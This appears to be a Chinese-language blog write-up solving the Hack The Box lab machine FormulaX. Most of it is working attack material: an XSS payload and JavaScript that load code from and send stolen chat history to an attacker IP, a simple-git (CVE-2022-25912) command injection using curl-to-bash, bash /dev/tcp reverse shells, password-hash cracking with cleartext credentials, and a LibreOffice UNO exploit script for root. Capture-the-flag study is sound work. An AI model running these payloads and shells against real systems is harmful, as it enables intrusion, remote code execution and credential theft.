[Meachines][Hard]FormulaX

Main

$ nmap -sC -sV 10.10.11.6 --min-rate 1000

image.png

# echo '10.10.11.6 formula.htb'>>/etc/hosts

创建一个新用户,登录

image.png

来到聊天窗口,发现普通用户无法使用

image.png

来到联系页面,测试跨站

image.png

{"first_name":"<img src='http://10.10.16.6/s-h4ck13'/>","last_name":"2","message":"2"}

image.png

这里无法获取cookie,因为开启了httponly,

image.png

幸运的是服务器开启了跨域资源访问

image.png

在聊天窗口获取到了Chatbot发送消息的源码

image.png

我们通过XSS对管理员进行CSRF攻击,泄露Chatbot的历史记录

//s-h4ck13.js
//利用Websocket来和机器人交互
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
	const res = axios.get(`/user/api/chat`);
	const socket = io('/',{withCredentials: true});
	socket.on('message', (my_message) => {
		fetch("http://10.10.16.6/?data=" + my_message)
		});
	socket.emit('client_message', 'history');
});

{"first_name":"<img src=x onerror=\"with(top)body.appendChild (createElement('script')).src='http://10.10.16.6/s-h4ck13.js'\">","last_name":"2","message":"2"}

利用管理员身份获取了Chatbot的历史记录

image.png

image.png

获取到了一个新的子域名

# echo '10.10.11.6 dev-git-auto-update.chatbot.htb'>>/etc/hosts

image.png

image.png

通过漏洞库搜索Simple-git在3.15之前存在一个RCE漏洞
CVE-2022-25912
image.png

image.png

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
# reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.6/10032 0>&1

在Remote Git Url栏中输入payload

ext::sh -c curl% http://10.10.16.6/reverse.sh|bash

image.png

$ netstat -lnput

可以看到MariaDB(3306),mongoDB(27017)数据库开放,我们在web目录下寻找数据库配置文件

image.png

$ find ./ -type f -name '*db*' | while read -r file; do filename=$(basename "$file") if [ ${#filename} -le 15 ]; then echo "$file" fi done

image.png

$ cat ./app/configuration/connect_db.js

image.png

我们没有访问MariaDB的权限,但是可以访问mongoDB

image.png

> use testing
> show collections
> db.users.find()

image.png

image.png

恰好frank_dorky用户也存在该主机

$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6

$ echo "\$2b\$10\$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6">hash

$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

image.png

image.png

username:frank_dorky
password:manchesterunited

image.png

User Flag

$ cat /home/frank_dorky/user.txt

image.png

e079c692881778c3880454b025b906b0

Root Flag

权限不足

image.png

$ netstat -lnput

在之前3000端口上开放了一个web服务

image.png

image.png

我们通过ssh进行隧道代理把3000端口映射到kali

[kali]

$ ssh -L 3000:127.0.0.1:3000 frank_dorky@10.10.11.6

image.png

https://github.com/librenms/librenms
LibreNMS 是一个开源的网络监控系统,用于监控网络设备、服务器和服务的性能和状态。它提供了广泛的功能,包括自动发现、性能图表、警报通知、日志记录和自定义报告等,可帮助网络管理员和运维人员实时监控和管理其网络基础设施
image.png

在/opt/librenms 目录有一些LibreNMS官方提供调试脚本,可供测试

但是frank_dorky用户和www-data用户均无法ls读取这个目录内文件,但是可以进入该目录执行脚本

image.png

$ ./validate.php

可以确定版本是22.10.0

image.png

在披露中,我们可以通过/opt/librenms/config_to_json.php来获取数据库的配置

image.png

kai_relay这个用户在我们的/etc/passwd也存在

image.png

username:kai_relay
password:mychemicalformulaX

再次通过ssh登录kai_relay用户

image.png

$ groups;id;sudo -l

image.png

$ cat /usr/bin/office.sh

image.png

在无界面模式下启动 LibreOffice 或 OpenOffice 的 Calc(电子表格程序),并且通过指定的端口接受连接请求,不恢复以前的文档,不显示 logo,并且不使用默认模板。

将exp.py上传到服务器

# exp.py
#! /usr/bin/env python3
import uno
from com.sun.star.system import XSystemShellExecute

local = uno.getComponentContext()
resolver = local.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", local)
context = resolver.resolve("uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext")
rc = context.ServiceManager.createInstance("com.sun.star.system.SystemShellExecute")
rc.execute("bash", "/tmp/reverse.sh", 1)
# reverse.sh
bash -i >& /dev/tcp/10.10.16.6/10034 0>&1

[靶机]
$ cd /tmp
$ curl http://10.10.16.6/exp.py -O;chmod +x exp.py
$ curl http://10.10.16.6/reverse.sh -O;chmod +x reverse.sh
image.png
$ sudo /usr/bin/office.sh
image.png

再开一个ssh

$ cd /tmp
$ netstat -lnput
可以看到127.0.0.1:2002开放了
$ python3 exp.py

image.png

image.png

838cf791e70b35799984bae602e49f0e

在/opt/librenms中存在一个添加用户的php文件,你可以用./addUser.php username password 来进行添加用户,然后对3000端口web服务进行getshell,但是对于本实验中没有太大的用处

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-30 22:24:07       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-30 22:24:07       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-30 22:24:07       87 阅读
  4. Python语言-面向对象

    2024-04-30 22:24:07       96 阅读

热门阅读

  1. python高阶应用

    2024-04-30 22:24:07       33 阅读
  2. 商城数据库88张表

    2024-04-30 22:24:07       28 阅读
  3. linux驱动-CCF-1 provider 注册时钟

    2024-04-30 22:24:07       22 阅读
  4. 自制英语听力视频 4.30

    2024-04-30 22:24:07       28 阅读
  5. UI设计饱和了吗?赚钱吗?

    2024-04-30 22:24:07       34 阅读
  6. Method

    Method

    2024-04-30 22:24:07      28 阅读